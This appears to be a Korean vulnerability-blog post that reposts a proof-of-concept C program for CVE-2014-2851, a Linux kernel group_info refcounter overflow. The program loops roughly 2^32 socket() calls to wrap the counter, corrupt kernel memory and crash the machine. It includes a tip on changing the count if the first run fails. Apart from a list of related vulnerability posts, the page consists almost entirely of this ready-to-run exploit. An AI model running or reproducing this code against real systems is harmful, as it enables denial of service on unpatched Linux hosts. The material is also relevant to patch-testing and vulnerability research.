728x90
Linux group_info refcounter overflow memory corruption denial of service exploit.
/*
* DoS poc for CVE-2014-2851
* Linux group_info refcounter overflow memory corruption
*
* https://lkml.org/lkml/2014/4/10/736
*
* @Tohmaxx - http://thomaspollet.blogspot.be
*
* If the app doesn't crash your system, try a different count (argv[1])
* Execution takes a while because 2^32 socket() calls
*
*/
#include <arpa/inet.h>
#include <stdio.h>
#include <sys/socket.h>
int main(int argc, char *argv[]) {
int i ;
struct sockaddr_in saddr;
unsigned count = (1UL<<32) - 20 ;
if(argc >= 2){
// Specify count
count = atoi(argv[1]);
}
printf("count 0x%x\n",count);
for(i = 0 ; (unsigned)i < count;i++ ){
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
if ( i % ( 1 << 22 ) == 0 )
printf("%i \n",i);
}
//Now make it wrap and crash:
system("/bin/echo bye bye");
}728x90
'취약점 정보1' 카테고리의 다른 글
| 번들 된 OpenSSL 라이브러리, 모바일 앱 및 Android4.1.1에 취약점 "Heartbleed"에 영향을 미치는 것을 확인 (0) | 2014.04.20 |
|---|---|
| OpenSSL의 HeartBleed 취약점에 대해 우리가주의해야 할 사항이란? (0) | 2014.04.20 |
| Adobe Flash Player Regular Expression Heap Overflow (0) | 2014.04.19 |
| 2014-04-19 취약점 정리 (0) | 2014.04.19 |
| CVE-2014-2597 - Denial of Service in PCNetSoftware RAC Server (0) | 2014.04.18 |